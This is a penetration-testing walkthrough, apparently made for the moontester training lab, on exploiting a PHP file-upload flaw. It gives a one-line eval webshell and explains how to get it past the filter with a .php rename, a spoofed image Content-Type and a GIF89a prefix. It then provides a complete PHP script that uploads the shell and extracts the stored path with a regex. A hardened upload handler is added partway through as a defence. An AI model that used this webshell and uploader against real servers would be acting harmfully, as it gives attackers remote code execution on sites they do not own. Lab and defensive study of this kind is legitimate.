1. Visit the 暗月 (moontester) lab target and test its file-upload vulnerability.
http://www.moontester.com/upload.php
2. One-line webshell: <?php eval($_POST['cmd']);?>
3. HTML of the file-upload form
<html>
<head></head>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
4. Upload 1.txt (a one-line webshell with an image header) and capture the request in Burp Suite.
Change the part's filename to 1.php and its Content-Type to image/gif.
Alternatively, capture the request with Wireshark on Kali; that capture is the request in its rawest form.
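Each of the three tricks just described (a renamed .php extension, a rewritten part Content-Type, and a GIF89a prefix in front of PHP source) only works against an upload handler that trusts a value the client chose. The hardened upload.php below is an added example written for this page, not the lab target's own handler. It takes the extension from an allowlist, sniffs the MIME type from the stored bytes with finfo instead of reading the part header, re-encodes the image through GD so the bytes written to disk are never the client's own, and saves under a random name without echoing the path back. The names UPLOAD_DIR, MAX_BYTES, ALLOWED, validate_upload and store_upload are this example's own; it assumes the fileinfo and GD extensions are loaded and that the uploads directory already exists and is served with PHP execution disabled (or sits outside the web root).

```php
<?php
declare(strict_types=1);

// Added example of a hardened upload handler (not the page's own upload.php).
// Assumptions: fileinfo and GD are loaded; UPLOAD_DIR exists and is not
// executable by the PHP engine (php_admin_flag engine off, or outside the web root).
const UPLOAD_DIR = __DIR__ . '/uploads';
const MAX_BYTES  = 2 * 1024 * 1024;

// Allowlist keyed by the extension we will WRITE. Each entry gives the MIME type
// that finfo must detect from the bytes, plus the GD loader/saver pair used to
// re-encode the image before it is stored.
const ALLOWED = [
    'gif' => ['image/gif',  'imagecreatefromgif',  'imagegif'],
    'jpg' => ['image/jpeg', 'imagecreatefromjpeg', 'imagejpeg'],
    'png' => ['image/png',  'imagecreatefrompng',  'imagepng'],
];

/**
 * Check one $_FILES entry against the allowlist.
 * Returns [true, $ext] when acceptable, or [false, $reason] when rejected.
 */
function validate_upload(array $f): array
{
    if (($f['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
        return [false, 'upload failed'];
    }
    if ($f['size'] > MAX_BYTES) {
        return [false, 'file too large'];
    }
    // (1) The client filename contributes only its extension, and only if that
    //     extension is on the allowlist: "1.php" stops here.
    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return [false, 'extension not allowed'];
    }
    // (2) $f['type'] is the part's Content-Type header and is attacker-controlled,
    //     so it is ignored; the MIME type is sniffed from the temporary file instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
    if ($mime !== ALLOWED[$ext][0]) {
        return [false, 'content does not match extension'];
    }
    return [true, $ext];
}

/**
 * Store an upload under a random name, re-encoded through GD. A "GIF89a" header
 * followed by PHP source passes the MIME sniff, which is why the stored bytes are
 * always GD's output and never the client's: the loader either fails on the
 * malformed data or produces pixels only, so no PHP source reaches the disk.
 * Returns the stored filename, or null when the upload is rejected.
 */
function store_upload(array $f): ?string
{
    [$ok, $ext] = validate_upload($f);
    if (!$ok) {
        return null;
    }
    [, $load, $save] = ALLOWED[$ext];
    $img = @$load($f['tmp_name']);   // false when the bytes do not decode as an image
    if ($img === false) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // never the client-chosen name
    $written = $save($img, UPLOAD_DIR . '/' . $name);
    imagedestroy($img);
    return $written ? $name : null;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
    $stored = store_upload($_FILES['file']);
    // The original handler printed "stored in: <path>", which is exactly what the
    // uploader script below greps for. A generic status message gives nothing away.
    echo $stored === null ? 'Upload rejected' : 'Upload stored';
}
```

The order of the checks matters: the extension allowlist is the control that actually prevents execution, the MIME sniff and GD re-encode protect the content, and the random filename plus non-executable directory are the safety net if a later bypass slips past the first three.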
Writing the getshell in PHP uses the sockets extension; make sure it is enabled in php.ini.
<?php
// Send a raw HTTP request to the host and return the complete response.
function http_send($host,$packet){
    $sock=fsockopen($host,80);
    if(!$sock){
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock=fsockopen($host,80);
    }
    fputs($sock,$packet);
    $resp='';
    while(!feof($sock)){
        $resp.=fread($sock,1024);
    }
    fclose($sock);
    return $resp;
}
// Build the multipart/form-data POST that upload.php expects. The same boundary
// string is used in the Content-Type header and (prefixed with "--") in the body.
function data($host,$filename){
    $boundary="---------------------86531354118821";
    $payload="--{$boundary}\r\n";
    $payload.="Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
    $payload.="Content-Type: image/jpeg\r\n\r\n";
    $payload.='GIF89a'."\r\n".'<?php eval($_POST["a"]);?>'."\r\n";
    $payload.="--{$boundary}\r\n";
    $payload.="Content-Disposition: form-data; name=\"sub\"";
    $payload.="\r\n\r\n";
    $payload.="12132\r\n";
    $payload.="--{$boundary}--\r\n";
    $packet="POST /upload.php HTTP/1.1\r\n";
    $packet.="Host: {$host}\r\n";
    $packet.="Content-Type: multipart/form-data; boundary={$boundary}\r\n";
    $packet.="Content-Length: ".strlen($payload)."\r\n";
    $packet.="Connection: close\r\n\r\n";
    $packet.=$payload;
    return $packet;
}
$filename="moon.php";
$host="target_sys.com";
// Keep the response in $html_str so it can be searched afterwards; print returns 1, not the page.
$html_str=http_send($host,data($host,$filename));
print $html_str;
?>
Filename
$filename="moon.php";
Site address
$host="www.moontester.com";
Print the content returned after the upload
$html_str=http_send($host,data($host,$filename));
print $html_str;
Running this returns the whole web page.
The response to the command contains a lot of content that is not wanted, so extract the webshell path from it and return only that.
Add a regular-expression match:
preg_match("/stored in:(.*?)</",$html_str,$m);
if(isset($m[1])){
    echo "http://".$host."/".$m[1];
}else{
    echo "false";
}
Note: preg_match is PHP's regular-expression function, used here to match and filter the content.